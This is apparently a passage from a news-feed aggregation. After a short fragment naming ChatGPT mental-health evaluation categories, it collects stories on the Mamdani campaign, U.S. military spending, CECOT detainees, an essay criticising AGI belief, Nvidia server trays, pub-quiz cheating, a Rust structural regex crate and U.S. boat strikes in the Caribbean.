  • Emotional Reliance not_unsafe - tests that the model does not produce disallowed content under our policies related to unhealthy emotional dependence or attachment to ChatGPT
  • Mental Health not_unsafe - tests that the model does not produce disallowed content under our policies in situations where there are signs that a user may be experiencing isolated delusions, psychosis, or mania

So these are the ChatGPT Psychosis benchmarks!

How Mamdani Won: Field Director Tascha Van Auken on Grassroots Organizing Behind Historic Victory

Democracy Now!
www.democracynow.org
2025-11-14 13:45:43
Mayor-elect Zohran Mamdani is less than two months away from taking office in New York City. Mamdani’s history-making campaign, grounded in community organizing, propelled the little-known Assembly-member to victory. Candidate Mamdani famously began the campaign polling at just 1% and overcam...
Original Article

Mayor-elect Zohran Mamdani is less than two months away from taking office in New York City. Mamdani’s history-making campaign, grounded in community organizing, propelled the little-known Assemblymember to victory. Candidate Mamdani famously began the campaign polling at just 1% and overcame intense scrutiny, Islamophobic attacks, criticism for his support for Palestinian rights, and more. By election day, more than 2 million New Yorkers had cast their votes, a turnout not matched in more than half a century.

His success is in part due to massive on-the-ground organizing and an operation of more than 104,000 volunteers. “We knew that we wanted it to be very big,” says Tascha Van Auken, field director for Zohran Mamdani’s mayoral campaign. “We prioritized developing leadership and bringing in as many volunteers as possible.”





“The Trillion Dollar War Machine”: William Hartung on How U.S. Military Spending Fuels Wars

Democracy Now!
www.democracynow.org
2025-11-14 13:31:44
Democracy Now! speaks to William Hartung about his new book “The Trillion Dollar War Machine” and who profits from the United States’ runaway military spending that fuels foreign wars. Hartung says that U.S. policy is “based on profit” and calls for a rethinking of our foreign entanglements. “...

“You Have Arrived in Hell”: Venezuelans Sent By U.S. to El Salvador Faced Torture, Sexual Abuse

Democracy Now!
www.democracynow.org
2025-11-14 13:23:43
252 Venezuelan immigrants in the United States were flown to El Salvador in the dead of night and indefinitely imprisoned at the Salvadoran mega-prison CECOT, the Terrorism Confinement Center. The detainees had no ability to communicate to the outside world before they were finally released to Venez...
Original Article

252 Venezuelan immigrants in the United States were flown to El Salvador in the dead of night and indefinitely imprisoned at the Salvadoran mega-prison CECOT, the Terrorism Confinement Center. The detainees had no ability to communicate with the outside world before they were finally released to Venezuela in a prisoner exchange. The men were “subjected to beatings almost daily upon arrival,” says Noah Bullock, executive director of Cristosal, who co-authored a report with Human Rights Watch documenting human rights abuses and torture in the prison.

The report also found that the prison guards were “clearly trying to hide their identities while they were torturing these Venezuelan migrants,” says Juan Pappier, Americas deputy director at Human Rights Watch.




AGI fantasy is a blocker to actual engineering

Hacker News
www.tomwphillips.co.uk
2025-11-14 13:21:24
Comments...
Original Article

Reading Empire of AI by Karen Hao , I was struck by how people associated with OpenAI believe in AGI. They really do think someone, perhaps them, will build AGI, and that it will lead to either the flourishing or destruction of humanity.

Elon Musk founded OpenAI because he thought Demis Hassabis was an evil genius who would build AGI first:

…Musk would regularly characterise Hassabis as a supervillain who needed to be stopped. Musk would make unequivocally clear that OpenAI was the good to DeepMind’s evil. … “He literally made a video game where an evil genius tries to create AI to take over the world,” Musk shouted [at an OpenAI off-site], referring to Hassabis’s 2004 title Evil Genius , “and fucking people don’t see it. Fucking people don’t see it! And Larry [Page]? Larry thinks he controls Demis but he’s too busy fucking windsurfing to realize that Demis is gathering the power.”

OpenAI’s co-founder and chief scientist Ilya Sutskever regularly told audiences and employees to “feel the AGI”. At a company off-site in Yosemite in September 2022, employees gathered around a firepit:

In the pit, [Sutskever] had placed a wooden effigy that he’d commissioned from a local artist, and began a dramatic performance. This effigy, he explained, represented a good, aligned AGI that OpenAI had built, only to discover it was actually lying and deceitful. OpenAI’s duty, he said, was to destroy it. … Sutskever doused the effigy in lighter fluid and lit it on fire.

I think it’s remarkable that what was until recently sci-fi fantasy has become a mainstream view in Silicon Valley.

Hao writes that GPT-2 was a bet on the “pure language” hypothesis, which asserts that since we communicate through language, AGI should emerge from training a model solely on language. This is in contrast to the “grounding” hypothesis, which asserts that an AGI needs to perceive the world. Successfully scaling GPT to GPT-2 convinced enough people at OpenAI that the pure language hypothesis was valid. They just needed more data, more model parameters, and more compute.

So the belief in AGI, plus the recent results from LLMs, necessitates scaling, and justifies building data centres that consume hundreds of litres of water a second, run on polluting gas generators because the grid can’t supply the power (and might use as much power as entire cities), driving up CO2 emissions from the manufacture and operation of new hardware, and exploiting and traumatising data workers to make sure ChatGPT doesn’t generate outputs like child sexual abuse material and hate speech or encourage users to self-harm. (The thirst for data is so great that they stopped curating training data and instead consume the internet, warts and all, and manage the model output using RLHF.)

And this is all fine, because they’re going to make AGI and the expected value (EV) of it will be huge! (Briefly, the argument goes that if there is a 0.001% chance of AGI delivering an extremely large amount of value, and a 99.999% chance of much less or zero value, then the EV is still extremely large, because (0.001% * very_large_value) + (99.999% * small_value) = very_large_value.)
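
To make that arithmetic concrete, here’s the same calculation with illustrative, made-up numbers (and “made up” is exactly the problem, as I’ll get to):

// Illustrative only: the probabilities and values below are invented, just like
// the ones in the EV argument itself.
fn main() {
    let p_agi = 0.00001_f64;  // a 0.001% chance of AGI "paying off"
    let v_agi = 1.0e15;       // an "extremely large" payoff, in arbitrary units
    let p_rest = 1.0 - p_agi; // a 99.999% chance of little or no value
    let v_rest = 1.0e3;       // a comparatively small payoff

    // The tiny-probability term dominates: this prints roughly 10_000_001_000
    let ev = p_agi * v_agi + p_rest * v_rest;
    println!("EV = {ev:.0}");
}

No matter how small you make the probability, you can always invent a payoff large enough to make the EV come out “huge”.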

But AGI arguments based on EV are nonsensical because the values and probabilities are made up and unfalsifiable. They also ignore externalities like environmental damage, which in contrast to AGI, have known negative value and certain probability: costs borne by everyone else right now.

As a technologist I want to solve problems effectively (by bringing about the desired, correct result), efficiently (with minimal waste) and without harm (to people or the environment).

LLMs-as-AGI fail on all three fronts. The computational profligacy of LLMs-as-AGI is dissatisfying, and the exploitation of data workers and the environment unacceptable. Instead, if we drop the AGI fantasy, we can evaluate LLMs and other generative models as solutions for specific problems, rather than all problems, with proper cost benefit analysis. For example, by using smaller purpose-built generative models, or even discriminative (non-generative) models. In other words, make trade-offs and actually do engineering.

Nvidia is gearing up to sell servers instead of just GPUs and components

Hacker News
www.tomshardware.com
2025-11-14 13:18:09
Comments...
Original Article
Nvidia
(Image credit: Nvidia)

The launch of Nvidia's Vera Rubin platform for AI and HPC next year could mark significant changes in the AI hardware supply chain as Nvidia plans to ship its partners fully assembled Level-10 (L10) VR200 compute trays with all compute hardware, cooling systems, and interfaces pre-installed, according to J.P. Morgan (via @Jukanlosreve ). The move would leave major ODMs with very little design or integration work, making their lives easier, but would also trim their margins in favor of Nvidia's. The information remains unofficial at this stage.

Starting with the VR200 platform, Nvidia is reportedly preparing to take over production of fully built L10 compute trays with a pre-installed Vera CPU, Rubin GPUs, and a cooling system instead of allowing hyperscalers and ODM partners to build their own motherboards and cooling solutions. This would not be the first time the company has supplied its partners with a partially integrated server sub-assembly: it did so with its GB200 platform when it supplied the whole Bianca board with key components pre-installed. However, at the time, this could be considered as L7 – L8 integration, whereas now the company is reportedly considering going all the way to L10, selling the whole tray assembly — including accelerators, CPU, memory, NICs, power-delivery hardware, midplane interfaces, and liquid-cooling cold plates — as a pre-built, tested module.

Nvidia
(Image credit: Nvidia/YouTube)

This move promises to shorten the ramp for VR200, as Nvidia's partners will not have to design everything in-house, and it could lower production costs thanks to the economies of scale ensured by a direct contract between Nvidia and an EMS (most likely Foxconn as the primary supplier, then Quanta and Wistron, but that is speculation). For example, a Vera Rubin Superchip board recently demonstrated by Jensen Huang uses a very complex design, a very thick PCB, and only solid-state components. Designing such a board takes time and costs a lot of money, so using select EMS provider(s) to build it makes a lot of sense.

J.P. Morgan reportedly cites the increase in power consumption of a single Rubin GPU from 1.4 kW (Blackwell Ultra) to 1.8 kW (R200) and even 2.3 kW (a previously unannounced TDP for an allegedly unannounced SKU; Nvidia declined a Tom's Hardware request for comment on the matter), along with increased cooling requirements, as one of the motivations for supplying the whole tray instead of individual components. However, we know from reported supply chain sources that various OEMs and ODMs, as well as hyperscalers like Microsoft, are experimenting with very advanced cooling systems, including immersion and embedded cooling, which underscores their expertise in this area.

However, Nvidia's partners will shift from being system designers to becoming system integrators, installers, and support providers. They are going to keep enterprise features, service contracts, firmware ecosystem work, and deployment logistics, but the 'heart' of the server — the compute engine — is now fixed, standardized, and produced by Nvidia rather than by OEMs or ODMs themselves.

Also, we can only wonder what will happen with Nvidia's Kyber NVL576 rack-scale solution based on the Rubin Ultra platform, which is set to launch alongside the emergence of 800V data center architecture meant to enable megawatt-class racks and beyond. The only question now is whether Nvidia will further increase its share of the supply chain to, say, rack-level integration.


Anton Shilov is a contributing writer at Tom’s Hardware. Over the past couple of decades, he has covered everything from CPUs and GPUs to supercomputers and from modern process technologies and latest fab tools to high-tech industry trends.

Q: Are phone cheats killing the pub quiz? A: Not according to these question setters

Guardian
www.theguardian.com
2025-11-14 13:17:37
Bans on smart devices, dedicated apps for all players and plain old honesty can all combat trivial offences Who is older, Gary Numan or Gary Oldman? If you know the answer to this question (see below), you are probably one of hundreds of thousands of Brits who attend a pub quiz every week. As a nati...
Original Article

Who is older, Gary Numan or Gary Oldman? If you know the answer to this question (see below), you are probably one of hundreds of thousands of Brits who attend a pub quiz every week.

As a nation of committed trivia buffs, it was unsurprising that news of a quizmaster in Manchester outing a team for cheating was leapt on. Just where, we asked, is the special place in hell reserved for those quizzers who take a sneaky look at their phones under the table?

According to the BBC, a “massive whodunnit” ensued after the landlord at the Barking Dog in Urmston revealed that the cheats were whispering questions into their smartphones, but refused to name and shame them.

It is a misdemeanour that is, according to some quizmasters, an increasingly common blight on one of the nation’s favourite pastimes.

“I think it’s definitely more prolific now, especially with smartwatches – even if you don’t have a phone in your hand, there’s still a way for you to be able to cheat,” said David Hartley, a quizmaster from Staffordshire.

The 33-year-old has hosted quizzes in four venues for nearly a decade and started banning devices about two years ago. “It just takes the mickey out of your quizmaster, if all you’re going to do is sit on your phone,” he said.

David Moyce, the landlord and quizmaster at the Alma in Cambridge, said he recently had to ban a group of students who won in suspicious circumstances. He had suspected cheating after the painfully weak team suddenly played their “joker” – which doubles points – before a round in which they got every question right.

“There was no proof. But then one of the gentlemen came back, handed over some money and said: ‘Yeah, we did cheat,’” Moyce said. “The guilt must have been so heavy on him that he literally handed his share of the money back. None of the others did though, so maybe he slept better than the other four.”

Some pubs have taken hi-tech measures to stop cheats, such as hosting smartphone quizzes where participants have to type in answers on their phones – and lose points if they suspiciously click away from the dedicated quizzing app to use another.

The SpeedQuizzing app promises to see off “the cheats and the chancers” by giving users only 10 seconds per question to lock in their answers in an attempt to restore what it calls “a once proud British tradition”.

Others take more traditional routes. The Prince of Wales in Highgate, north London, has a fiercely peer-policed quiz, according to Marcus Berkmann, who has competed in it more than 200 times and now regularly writes its questions.

“We’re very harsh on anyone who cheats, so no one does it,” said Berkmann, who is the author of A Matter of Facts: The Insider’s Guide to Quizzing. “The regulars would rather boil themselves in oil than cheat.

“Occasionally, you read out a warning and say: ‘We’re testing you on what you know, not what you can look up on Google,’ and people generally go along with that.”

The precise origins of the pub quiz are shrouded in a pre-smoking-ban haze, but they became popular in the 1970s, boosted by Sharon Burns and Tom Porter, whose company Burns and Porter supplied readymade quizzes as a way for pubs to lure drinkers in on quieter nights.

Today, quizzing in the UK remains a serious business, marrying as it does the great British pastimes of drinking and taking pleasure in being right. According to a recent survey commissioned by the brewer Greene King, 70% of people regularly take part in a pub quiz and almost one in 10 goes every single week.

Quizmasters could be forgiven for wanting to return to the simpler times of Burns and Porter, but can also take some solace in knowing that their predecessors also had to deal with cheats.

Gail Taylor, for example, responded to a Guardian callout this week to finally come clean about her youthful cheating in Sheffield pubs in the 1980s.

According to Taylor, she planted rudimentary bugging devices underneath pub tables to transmit the questions to encyclopedia-armed friends in a van outside.

The Guardian could not independently verify her tale, but she insisted it was true. “Something always went wrong,” Taylor said. “If the signal didn’t work, we’d write the questions down, rush out to the van with two pints and a list, then someone else would go out and bring back the answers. Nobody seemed to catch on what we were doing.”

Reflecting on the crime more than three decades later, Taylor is entirely without remorse. “We didn’t have Google then, so we never won anything anyway,” she says. “I don’t feel guilty about it at all. And if I had the chance, I’d do it again tomorrow.”

Answer: Gary Numan is older than Gary Oldman by 13 days.

A structural regular expression engine for Rust

Lobsters
www.sminez.dev
2025-11-14 13:14:44
Comments...
Original Article

Implementing a structural regular expressions engine for x/fun and.*/ v/profit/

If you have ever looked at regular expressions and thought "gee, these sure are useful but I wish there was more going on", then do I have a blog post for you!

OK, hear me out. I promise there's some fun stuff in here that's worth a look. It might only be worth an "oh god why?" kind of look, but worth a look none the less.

Allow me to introduce you to the delightful world of structural regular expressions.

xkcd perl Obligatory XKCD.

I love the smell of regular expressions in the morning

Introduced by Rob Pike in his Sam text editor, and discussed in his 1987 paper , structural regular expressions provide a notation and semantics for composing the regular expressions we all know and love in order to more easily describe the structure of the text being searched.

This composition idea allows for writing chains of smaller, easier-to-reason-about expressions that drill down into the text being searched. The primary goal is to let you break the text up into the meaningful chunks you care about, rather than always being forced into looping over lines.

It's always easier to understand what is going on with a concrete example. Let's start with an easy one: have a look at the following text and determine the name of each programmer and what their language of choice is.

    name: Alice
    occupation: programmer
    language of choice: Rust

    name: Bob
    language of choice: Go
    occupation: programmer

    name: Claire
    occupation: linguist
    language of choice: French

Hopefully it only takes you a second or two to work the answer out. You might not even notice that the order of the fields in each record is inconsistent.

Now, what if I asked you to write me a program to extract that information from the text?

It's not a particularly complicated program to write. For example, the following python script gets the job done just fine:

with open("haystack.txt", "r") as f:
    haystack = f.read()
    for chunk in haystack.split("\n\n"):
        if "programmer" in chunk:
            for line in chunk.split("\n"):
                if "name:" in line:
                    name = line.split(": ")[1]
                elif "lang" in line:
                    lang = line.split(": ")[1]

            print(f"{name} prefers {lang}")

# Prints:
# Alice prefers Rust
# Bob prefers Go

But attempting to do this with regular expressions becomes tricky, if not downright impossible. We can't just look for the names and preferred languages directly as Claire isn't a programmer. Even if we could, we need to extract the name alongside the language, and the language can appear before or after the occupation line. So attempting to cover all cases with a single expression quickly starts to get messy.
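
To get a feel for the mess, here is one hypothetical single-pattern attempt that only copes with the two field orderings present in this particular input; the language lands in a different capture group depending on which branch matched, and every new ordering or extra field means yet another branch:

name: (.*)\n(?:occupation: programmer\nlanguage of choice: (.*)|language of choice: (.*)\noccupation: programmer)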

Really what we want is the logic from the Python script (minus the manual string manipulation):

  • Split the text into paragraphs
  • Drop any paragraphs that aren't for a programmer
  • Extract the name and language fields
  • Pretty print the results

Which, coincidentally, is what the following structural regular expression 1 does:

y/\n\n/
g/programmer/
x/name: (.*)@*lang.*: (.*)/
p/{1} prefers {2}/
Alice prefers Rust
Bob prefers Go

I'm not sure about you, but personally I think that's pretty cool.

I strongly recommend that you have a read through Rob's paper. It's all of 6 pages long and it does a great job of demonstrating the sorts of problems that regular expression based tools can run into, and how a new approach could help.

The paper also makes a point of calling out that what it's doing is highlighting some interesting problems to look into, rather than offering up a fully formed solution, and that the hope is to encourage others to think about how they might apply these ideas elsewhere.

So, with that in mind: let's take a look at how we might take these ideas and run with them!


We're going to need a bigger parser

The syntax used by Pike in Sam combined looping constructs and conditional filters with printing and editing actions such as deleting, replacing or inserting around a match of a regular expression. There have been a handful of other implementations over the years, notably Pike's later editor acme, vis, and my own editor ad, all of which follow this same approach of coupling the composition operators with editing actions that are applied to each match. (Sam itself also provided a number of additional operators for working with the state of the editor itself that we won't cover here.)

As we saw in the example above, the syntax used for this takes inspiration from classic regular expressions in being really quite terse. Operators and actions share a common syntax of a single character to identify the action followed by an argument enclosed in forward slashes.

Writing a structural regular expression then involves writing a pipeline of operators ending in an action that is applied to any matches that are found. To kick things off, the selected text begins as the full haystack (or, in the case of the text editors, the current selection within the editor). From there, the first operator is run and any matches it finds are passed along to subsequent expressions in the pipeline: additional operators act with flat-map and filter semantics, and actions are applied before processing the next match. (There's a short code sketch of this correspondence after the operator and action lists below.)

For operators, the argument is always a regular expression re 2 :

  • x/re/ for each match of re , run the expressions that follow
  • y/re/ between each match of re , run the expressions that follow
  • g/re/ if re matches, run the expressions that follow
  • v/re/ if re does not match, run the expressions that follow

For actions, the argument is text to be inserted into the file. 3 :

  • a/text/ append text after the match
  • i/text/ insert text before the match
  • c/text/ change the match to text
  • p/text/ print text
  • d delete the match
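
Before we walk through the example again, here's a minimal, stand-alone sketch (it has nothing to do with how Sam or structex are implemented, it's just a mental model) of how these operators map onto ordinary iterator combinators, using the regex crate. The @ meta-character in the expression above is specific to ad's engine, so the sketch spells it as (?:.|\n)* instead:

// A sketch of the y/g/x/p pipeline from earlier, written with plain iterator
// combinators and the regex crate rather than a structural regex engine.
use regex::Regex;

fn main() {
    let haystack = "\
name: Alice
occupation: programmer
language of choice: Rust

name: Bob
language of choice: Go
occupation: programmer

name: Claire
occupation: linguist
language of choice: French";

    // x/name: (.*)(?:.|\n)*lang.*: (.*)/ in regex crate syntax
    let re = Regex::new(r"name: (.*)(?:.|\n)*lang.*: (.*)").unwrap();

    haystack
        .split("\n\n")                                // y/\n\n/ : split between matches
        .filter(|block| block.contains("programmer")) // g/programmer/ : keep matching blocks
        .filter_map(|block| re.captures(block))       // x/.../ : narrow and extract submatches
        .for_each(|caps| {
            // p/{1} prefers {2}/ : render the submatches
            println!("{} prefers {}", &caps[1], &caps[2]);
        });
}

Running it against the programmer haystack prints the same two lines that the p action produced.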

Putting it all together

Lets revisit our expression from before:

  y/\n\n/
  g/programmer/
  x/name: (.*)@*lang.*: (.*)/
  p/{1} prefers {2}/

If we look at each line in turn, we can follow the pipeline as it executes and see how it breaks apart the input text to find the answer to our question:

  • y/\n\n/

Our first operator acts as a "split" on the input text, breaking it into three blocks:

    name: Alice
    occupation: programmer
    language of choice: Rust

    name: Bob
    language of choice: Go
    occupation: programmer

    name: Claire
    occupation: linguist
    language of choice: French
  • g/programmer/

Next, we apply a filter to accept only those blocks that contain the expression "programmer":

    name: Alice
    occupation: programmer
    language of choice: Rust

    name: Bob
    language of choice: Go
    occupation: programmer
  • x/name: (.*)@*lang.*: (.*)/

After that we narrow the selection using another regular expression, this time extracting submatches so we have them available for printing:

    name: (Alice)
    occupation: programmer
    language of choice: (Rust)

    name: (Bob)
    language of choice: (Go)
  • p/{1} prefers {2}/

Finally, we use the extracted submatches to fill in our template string and print the result:

Alice prefers Rust
Bob prefers Go

Lovely!

But, what if we also want to deal with the fact that Claire is a linguist? Luckily, we've got one final piece of syntax to introduce that can help us out there as well.

The final trick we have up our sleeve is to enclose multiple pipelines in curly braces. Doing so marks these separate pipelines as being run in parallel with one another over each match that flows into the "group". Each branch of the parallel group is terminated with a semicolon (of course) and behaves the same as any other chain of operators ending in an action. The difference is that each match produced by the preceding operator in the pipeline is run through all branches of the parallel group simultaneously .

Let's update our original expression to use a parallel group. We'll start the group once we've split the input into blocks, this time adding an alternative pipeline that will run when the matched text contains "linguist":

 y/\n\n/ {
   g/programmer/
   x/name: (.*)@*lang.*: (.*)/
   p/{1} prefers {2}/;

+  g/linguist/
+  x/name: (.*)@*lang.*: (.*)/
+  p/{1} has no time for this nonsense, they're busy discussing {2}/;
 }

If we run this new expression, we'll get the output we had before (from the original pipeline) along with the output from our second parallel branch:

Alice prefers Rust
Bob prefers Go
Claire has no time for this nonsense, they're busy discussing French

Hopefully now you're starting to see how this sort of system can be a powerful tool to have available! When built into a text editor, these expressions form a mini editing language that allows you to do a bunch of useful stuff.

The example we've been looking at so far has just been making use of printing. Let's try editing the text instead, using some new, non-controversial text as our input:

You'll make a lot of people angry if you say that Vim is better than Emacs.
(Really, we all know that Emacs is the best).

Now, before anyone gets upset, we can rewrite this to align to the other side of the editor holy war (if you are that way inclined) using the following structural regular expression:

{
  x/Emacs/ c/Vim/;
  x/Vim/ c/Emacs/;
}
You'll make a lot of people angry if you say that Emacs is better than Vim.
(Really, we all know that Vim is the best).

Using a parallel group inside of our structural regular expression allows us to swap Emacs for Vim (and vice versa) simultaneously, avoiding the all too common problem of accidentally ending up with everything turning into "Emacs" because the replacements were run sequentially.


Toto, I don't think we're in Bell Labs anymore

Everything we've seen so far can be found as part of the original Sam engine and its derivatives, and this is perfectly fine for implementing an embedded editing language for a text editor. But, we're missing a trick in being able to provide a general purpose engine that could be adapted for a variety of use cases.

To do that we need to break things apart slightly.

Rather than interleaving the operators and actions into a single system, we can instead write a generic engine that handles the "identify interesting structure" side of the problem (the operators), which then feeds that structure into the handling logic of your choice (actions that are tailored to the problem you're trying to solve). In effect, what we end up doing is tagging subsections of the text being searched for later processing.

Enter structex: a Rust crate I've been working on recently, after overhauling the engine inside of ad, that is my attempt to write the engine I've just outlined. In addition to the core engine functionality, it provides a variety of quality-of-life pieces to make writing custom engines a little simpler, such as a simple templating engine, a builder struct for configuring the behaviour of the expression compiler, and a set of traits that allow you to provide your own underlying regular expression engine if needed.

Let's take a look at how we can use structex to write a minimal CLI tool that is capable of running the grep-like pretty-printing expression we started with. If you have a local Rust toolchain installed you can try running this by setting up a new project and adding the regex and structex crates.

use std::collections::HashMap;
use structex::{Structex, template::Template};

fn main() -> Result<(), Box<dyn std::error::Error>> {
    // (1)
    let args: Vec<String> = std::env::args().skip(1).collect();
    let se: Structex<regex::Regex> = Structex::new(&args[0])?;
    let haystack = std::fs::read_to_string(&args[1])?;

    // (2)
    let mut templates = HashMap::new();
    for action in se.actions() {
        let arg = action.arg().unwrap();
        templates.insert(action.id(), Template::parse(arg)?);
    }

    // (3)
    for caps in se.iter_tagged_captures(haystack.as_str()) {
        let id = caps.id().unwrap();
        println!("{}", templates[&id].render(&caps)?);
    }

    Ok(())
}

So what's going on here?

  1. We read in our arguments from the command line and use the first to compile a new Structex using the regex crate as the backing engine. The second argument is the path of the file we read in as the haystack we're going to search.
  2. We ask our newly compiled Structex for the actions that it found in the compiled expression and we parse the argument to each action as a Template we can use later to pretty print the match.
  3. We call iter_tagged_captures to find each match inside of the haystack. Every time a match is found it is returned to us with its associated action, allowing us to look up the template and pretty print the result.

To run this, we'll need to slightly tweak the expression we used before: the @ meta-character we were using is a feature of ad 's engine and not supported by the regex crate. Luckily, we can swap it out for (?:.|\n) and achieve the same effect. 4 (Albeit with a much uglier syntax!)

$ cargo run --  '
y/\n\n/ {
  g/programmer/
  x/name: (.*)(?:.|\n)*lang.*: (.*)/
  p/{1} prefers {2}/;

  g/linguist/
  x/name: (.*)(?:.|\n)*lang.*: (.*)/
  p/{1} has no time for this nonsense, they are busy discussing {2}/;
}' haystack.txt

Alice prefers Rust
Bob prefers Go
Claire has no time for this nonsense, they are busy discussing French

Nice!

But what if we want to run the second example? The one where we swapped "Emacs" and "Vim"? There the semantics of what we want to do are a little different. It's more like sed, where we default to echoing out unmatched text and modify the text of matches inside of that output stream.

In that case we'll want something more like this:

use std::collections::HashMap;
use structex::{Structex, template::Template};

fn main() -> Result<(), Box<dyn std::error::Error>> {
    let args: Vec<String> = std::env::args().skip(1).collect();
    let se: Structex<regex::Regex> = Structex::new(&args[0])?;
    let haystack = std::fs::read_to_string(&args[1])?;

    // (1)
    let mut templates = HashMap::new();
    for action in se.actions() {
        if let Some(arg) = action.arg() {
            templates.insert(action.id(), Template::parse(arg)?);
        }
    }

    // (2)
    let mut pos = 0;

    for caps in se.iter_tagged_captures(haystack.as_str()) {
        let action = caps.action.as_ref().unwrap();
        let id = action.id();

        // (3)
        if caps.from() > pos {
            print!("{}", &haystack[pos..caps.from()]);
        }

        // (4)
        match action.tag() {
            'd' => (), // just consume the matched text
            'c' => print!("{}", templates[&id].render(&caps)?),
            'i' => print!("{}{}", templates[&id].render(&caps)?, caps.as_slice()),
            'a' => print!("{}{}", caps.as_slice(), templates[&id].render(&caps)?),
            tag => panic!("unknown action {tag}"),
        }

        // (5)
        pos = caps.to();
    }

    // (6)
    if pos < haystack.len() {
        print!("{}", &haystack[pos..]);
    }

    Ok(())
}

A little more going on this time:

  1. We handle our command line arguments the same way, but now when we parse our templates we need to skip actions that don't have a template (like our d delete action).
  2. In order to handle printing out unmatched text, we'll need to track where we are in the input before we start iterating over matches.
  3. Each time we find a match we check to see if it's after our current position; if it is, we simply print out the unedited input up until the match.
  4. Next, we check the "tag" of the action associated with the match to determine how it should be handled. We still render the templates as before but how the resulting text makes its way into the output depends on the tag.
  5. After processing each match, we update where we are in the input before handling the next one.
  6. Once all of the matches have been found, we check one last time to see if we need to print any remaining input (otherwise we'd cut things short at the end of the final match!)

Phew! OK, let's test it out:

$ cargo run -- '{
  x/Emacs/ c/Vim/;
  x/Vim/ c/Emacs/;
}' haystack2.txt

You'll make a lot of people angry if you say that Emacs is better than Vim.
(Really, we all know that Vim is the best).

So far so good. We also added support for other actions, so let's test them out as well:

$ cargo run -- '{
  n/a lot of / d;        # delete the first occurrence of "a lot of "
  x/Emacs/ i/Gnu /;      # Insert "Gnu " before each occurrence of "Emacs"
  x/Vim/ a/ (or Vi)/;    # Append " (or Vi)" after each occurrence of "Vim"
}' haystack2.txt

You'll make people angry if you say that Vim (or Vi) is better than Gnu Emacs.
(Really, we all know that Gnu Emacs is the best).

It works!

The n operator here is something we haven't seen before: it's an addition I've made to the semantics of Sam's engine that "narrows" to the first match of the given regular expression rather than looping over all matches. In effect it's similar to the classic sed s/regex/replacement/ but it allows for providing further operators or the action of your choice in place of the fixed replacement text.


Wrapping up 5

Now, there is obviously a lot of unwrapping going on in these examples and, if you experiment a little yourself, you'll quickly find that you can get some unexpected behaviour and crashes. To handle things more robustly we'd want to control what sorts of expressions were permitted and we'd need to be a little more careful about how we work with the actions associated with each match.

In the structex repo I've included some more realistic versions of these two programs in the form of the sgrep and ssed examples. They also make use of a copy of ad 's regex engine in order to support matching against streams, allowing you to run them over standard in as well as against named files. If you like the ideas presented in this blog post I'd encourage you to take a look and have a go at adding your own actions to see what sorts of tools you can come up with!

To finish off I'll take one last page out of Rob Pike's book and call out some of the open problems and areas where it might be possible to take this idea in the future. Firstly, there are certainly multiple opportunities for improving the performance of this thing: the current design is based on flexibility and proving out this idea of splitting apart the matching engine and the application of actions to matches. I think that it should be possible to compile expressions down to an automata for direct, efficient execution but at that point you'd no longer be able to bring your own regex engine. Is that worth it? I'm not sure. But it would be fun to try out at some point. It would also be fun to take a stab at implementing a structex based awk (as proposed by Pike in his paper) but I'll be honest, getting a full language implemented is something I'm not sure I have time to tackle at the moment!

So there we have it. A strange new tool to add to your toolbox, or, avoid like the plague if what you've seen here isn't to your taste. But I assume that if you've made it this far you've at least got a passing interest in taking this thing for a spin.

Until next time, happy hacking!




“Gunboat Diplomacy”: U.S. War in Latin America Feared as Hegseth Launches "Operation Southern Spear"

Democracy Now!
www.democracynow.org
2025-11-14 13:13:11
Defense Secretary Pete Hegseth has announced the launch of Operation Southern Spear to target suspected drug traffickers in South America, Central America and the Caribbean. The U.S. now has 15,000 military personnel in the region. Over the past two months the U.S. has blown up at least 20 boats in ...
Original Article

This is a rush transcript. Copy may not be in its final form.

AMY GOODMAN : This is Democracy Now! , democracynow.org, The War and Peace Report. I’m Amy Goodman in New York joined by Democracy Now! ’s Juan González in Chicago. Hi, Juan.

JUAN GONZÁLEZ: Hi, Amy, and welcome to all of our listeners and viewers across the country and around the world.

AMY GOODMAN : Defense Secretary Pete Hegseth has announced the launch of Operation Southern Spear to target suspected drug traffickers, he says. In a post on X, Hegseth wrote, quote, “Today, I’m announcing Operation Southern Spear led by Joint Task Force Southern Spear and SOUTHCOM . This mission defends our homeland, removes narcoterrorism from our hemisphere, and secures our homeland from the drugs that are killing our people,” unquote.

The announcement comes as the Pentagon continues to amass warships in the Caribbean. The USS Gerald R. Ford aircraft carrier arrived earlier this week. The U.S. now has 15,000 military personnel in the region. It’s the largest buildup in the region in decades, according to the New York Times . Over the past two months, the U.S. has blown up at least 20 boats in the Caribbean and Eastern Pacific. The latest strike killed four people on Thursday.

The Pentagon claims the boats were carrying drugs, but officials have acknowledged they don’t know who’s been killed. Critics have denounced the strikes as illegal extrajudicial killings. We begin today’s show with Juan Pappier, the Americas Deputy Director at Human Rights Watch. We welcome you to Democracy Now! , Juan. Begin by talking about Operation Southern Spear and what this means.

JUAN PAPPIER : Amy, thank you for having me. We don’t know what Operation Southern Spear means. The Secretary has not provided details. But we have every reason to be concerned because in the buildup of this announcement, as you mentioned, 80 people have been killed in what are extrajudicial executions under international law.

There is no denying that the problem of narcotics in the United States and the problem of organized violence in Latin America are serious, but they’re not armed conflicts, and the U.S. government cannot pretend otherwise to circumvent its obligations under international law. The U.S. government cannot strike boats as it pleases. These are extrajudicial executions, which are grave violations.

JUAN GONZÁLEZ: And, Juan, isn’t it true that most of the drugs that come into the United States, whether it’s fentanyl or cocaine, come through Mexico, and yet, the Trump administration is directing all of its attention to the Caribbean and the Pacific just off the coast of South America?

JUAN PAPPIER : Well, fentanyl comes from Mexico. Cocaine comes mostly from Colombia, in most cases, through the Pacific. But regardless of the drug routes that are being employed to bring these drugs, striking boats is not the appropriate way to respond to organized crime. These people should be brought to justice, they should be prosecuted, and importantly, the United States should be supporting efforts to dismantle these organized crime groups. Striking vessels in the Caribbean are extrajudicial executions, which are banned by international law.

JUAN GONZÁLEZ: And has there been any attempt by international organizations, especially the United Nations, to address this issue?

JUAN PAPPIER : Well, the U.N. Human Rights Chief, Volker Türk, has expressed concern and consternation about these violations. We have seen expressions of concern by Latin American governments, Colombia, Mexico, Brazil, amongst others. And we at Human Rights Watch have a team ready to document what is happening in the Caribbean and to make sure that we expose and denounce violations of human rights law as they are occurring.

AMY GOODMAN : We’re talking to Juan Pappier, the Americas Deputy Director at Human Rights Watch, and our own Juan González. Juan, you were in Panama for the U.S. invasion. This was during President George H. W. Bush. You certainly know, and have studied and have been there throughout Latin America when it comes to U.S. foreign policy. Can you talk about your observations of what’s happening here with these extrajudicial killings of scores of people? It is astounding that the U.S. has not presented any evidence that they are narcoterrorists, as Pete Hegseth says.

